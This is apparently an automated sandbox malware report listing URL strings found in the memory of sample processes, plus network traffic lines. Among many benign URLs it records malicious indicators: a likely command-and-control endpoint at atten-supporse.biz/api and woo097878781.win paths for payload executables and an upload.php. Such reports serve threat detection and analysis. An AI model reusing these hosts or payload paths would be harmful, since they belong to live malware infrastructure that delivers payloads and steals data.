Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: file.exe, file.exe, 00000000.00000002.2126531064.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: file.exe, 00000000.00000002.2116649444.0000000005F65000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2125898373.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 60c1233683.exe, 00000022.00000003.2784469530.00000000055D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 60c1233683.exe, 00000022.00000003.2784469530.00000000055D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.1872147865.000000000184B000.00000004.00000020.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2977391726.00000000129F0000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2723362771.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2724311923.00000000055EC000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728108158.00000000055EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 0000001C.00000002.2777328250.0000000004CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: 60c1233683.exe, 00000022.00000003.2753152898.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000002.2963578166.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000002.2958937922.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2874831916.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2904209144.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728825814.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/
Source: 60c1233683.exe, 00000022.00000003.2847457804.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2847599444.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2848077723.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/QQ
Source: 60c1233683.exe, 00000022.00000002.2958937922.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2753152898.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000002.2963578166.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2874831916.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2904209144.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api
Source: 60c1233683.exe, 00000022.00000002.2958937922.0000000000D23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api#D
Source: 60c1233683.exe, 00000022.00000003.2753152898.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/n
Source: 60c1233683.exe, 00000022.00000003.2753152898.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/v
Source: 60c1233683.exe, 00000022.00000002.2958937922.0000000000D23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/api
Source: file.exe, 00000000.00000002.2114430584.0000000001823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.2114430584.0000000001823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: file.exe, 00000000.00000003.1872147865.000000000184B000.00000004.00000020.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2977391726.00000000129F0000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2723362771.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2724311923.00000000055EC000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728108158.00000000055EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1872147865.000000000184B000.00000004.00000020.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2977391726.00000000129F0000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2723362771.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2724311923.00000000055EC000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728108158.00000000055EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1872147865.000000000184B000.00000004.00000020.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2977391726.00000000129F0000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2723362771.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2724311923.00000000055EC000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728108158.00000000055EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2114430584.0000000001823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.2114430584.0000000001823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 0000001C.00000002.2807680074.0000000005D38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001C.00000002.2807680074.0000000005D38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001C.00000002.2807680074.0000000005D38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: file.exe, 00000000.00000003.1872147865.000000000184B000.00000004.00000020.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2977391726.00000000129F0000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2723362771.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2724311923.00000000055EC000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728108158.00000000055EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1872147865.000000000184B000.00000004.00000020.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2977391726.00000000129F0000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2723362771.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2724311923.00000000055EC000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728108158.00000000055EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1872147865.000000000184B000.00000004.00000020.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2977391726.00000000129F0000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2723362771.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2724311923.00000000055EC000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728108158.00000000055EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000002.00000003.1776028720.000002554F6C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000002.00000003.1776028720.000002554F672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000002.00000003.1776028720.000002554F6C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000002.00000003.1776028720.000002554F6A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000002.00000003.1776028720.000002554F6C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 0000001C.00000002.2777328250.0000000004E26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: callmobile.exe, 0000001B.00000002.3358250427.0000000005C40000.00000004.08000000.00040000.00000000.sdmp, callmobile.exe, 0000001B.00000002.3325178734.0000000004178000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: callmobile.exe, 0000001B.00000002.3358250427.0000000005C40000.00000004.08000000.00040000.00000000.sdmp, callmobile.exe, 0000001B.00000002.3325178734.0000000004178000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: callmobile.exe, 0000001B.00000002.3358250427.0000000005C40000.00000004.08000000.00040000.00000000.sdmp, callmobile.exe, 0000001B.00000002.3325178734.0000000004178000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: file.exe, 00000000.00000002.2114430584.0000000001823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: powershell.exe, 0000001C.00000002.2807680074.0000000005D38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000002.00000003.1776028720.000002554F6C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000002.00000003.1776028720.000002554F672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: callmobile.exe, 0000001B.00000002.3358250427.0000000005C40000.00000004.08000000.00040000.00000000.sdmp, callmobile.exe, 0000001B.00000002.3325178734.0000000004178000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: callmobile.exe, 0000001B.00000002.2962692398.0000000003171000.00000004.00000800.00020000.00000000.sdmp, callmobile.exe, 0000001B.00000002.3358250427.0000000005C40000.00000004.08000000.00040000.00000000.sdmp, callmobile.exe, 0000001B.00000002.3325178734.0000000004178000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: callmobile.exe, 0000001B.00000002.3358250427.0000000005C40000.00000004.08000000.00040000.00000000.sdmp, callmobile.exe, 0000001B.00000002.3325178734.0000000004178000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: 60c1233683.exe, 00000022.00000003.2728503436.0000000005603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: 60c1233683.exe, 00000022.00000003.2791004854.00000000057C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 60c1233683.exe, 00000022.00000003.2791004854.00000000057C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.1999428433.000000000C326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1860911185.0000000005E5D000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2753720276.00000000055FA000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2752316946.00000000055FA000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728503436.0000000005601000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728640685.00000000055FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 60c1233683.exe, 00000022.00000003.2728640685.00000000055D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1860911185.0000000005E5D000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2753720276.00000000055FA000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2752316946.00000000055FA000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728503436.0000000005601000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728640685.00000000055FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 60c1233683.exe, 00000022.00000003.2728640685.00000000055D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: powershell.exe, 0000001C.00000002.2777328250.0000000004E26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2777328250.00000000052B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win
Source: explorer.exe, 00000027.00000003.2837083697.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win/
Source: powershell.exe, 0000001C.00000002.2807680074.0000000006125000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2807680074.00000000060A7000.00000004.00000800.00020000.00000000.sdmp, downloaded_file.exe, 00000024.00000000.2762185541.0000000000946000.00000008.00000001.01000000.0000001C.sdmp, downloaded_file.exe, 00000024.00000002.2769113649.0000000000946000.00000008.00000001.01000000.0000001C.sdmp	String found in binary or memory: https://woo097878781.win/32.EXEhttps://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66M
Source: explorer.exe, 00000027.00000003.2836388369.00000000013D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2834435232.00000000013E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win/64.EXE
Source: downloaded_file.exe, 00000024.00000003.2763632421.0000000001275000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66Mozilla/5.0
Source: explorer.exe, 00000027.00000003.2837083697.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win/6e8
Source: downloaded_file.exe, 00000024.00000003.2763632421.0000000001270000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2836388369.00000000013D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2961440293.00000000035A7000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win/WindosCPUsystem.exe
Source: powershell.exe, 0000001C.00000002.2807680074.0000000006120000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2807680074.00000000060A2000.00000004.00000800.00020000.00000000.sdmp, downloaded_file.exe, 00000024.00000000.2762185541.0000000000941000.00000008.00000001.01000000.0000001C.sdmp, downloaded_file.exe, 00000024.00000002.2769113649.0000000000942000.00000008.00000001.01000000.0000001C.sdmp, explorer.exe, 00000027.00000002.2956724746.0000000002E2E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1WindosCPUsystem.exe
Source: powershell.exe, 0000001C.00000002.2777328250.00000000052B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win/downloaded_file.bin
Source: powershell.exe, 0000001C.00000002.2777328250.0000000004E26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2777328250.00000000052B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win/downloaded_file.binxKd
Source: file.exe, 00000000.00000002.2114430584.0000000001823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: file.exe, 00000000.00000003.1872147865.000000000184B000.00000004.00000020.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2977391726.00000000129F0000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2723362771.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2724311923.00000000055EC000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728108158.00000000055EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.2114430584.0000000001823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: file.exe, 00000000.00000003.1872147865.000000000184B000.00000004.00000020.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2977391726.00000000129F0000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2723362771.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2724311923.00000000055EC000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728108158.00000000055EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000002.2113309307.0000000000C57000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: 60c1233683.exe, 00000022.00000003.2791004854.00000000057C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.2113309307.0000000000C57000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/zRERlhhmKB.exe
Source: file.exe, 00000000.00000002.2113309307.0000000000C57000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: 60c1233683.exe, 00000022.00000003.2791004854.00000000057C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.2113309307.0000000000C57000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1999428433.000000000C326000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2791004854.00000000057C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 60c1233683.exe, 00000022.00000003.2791004854.00000000057C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.2113309307.0000000000C57000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1999428433.000000000C326000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2791004854.00000000057C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2113309307.0000000000C57000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
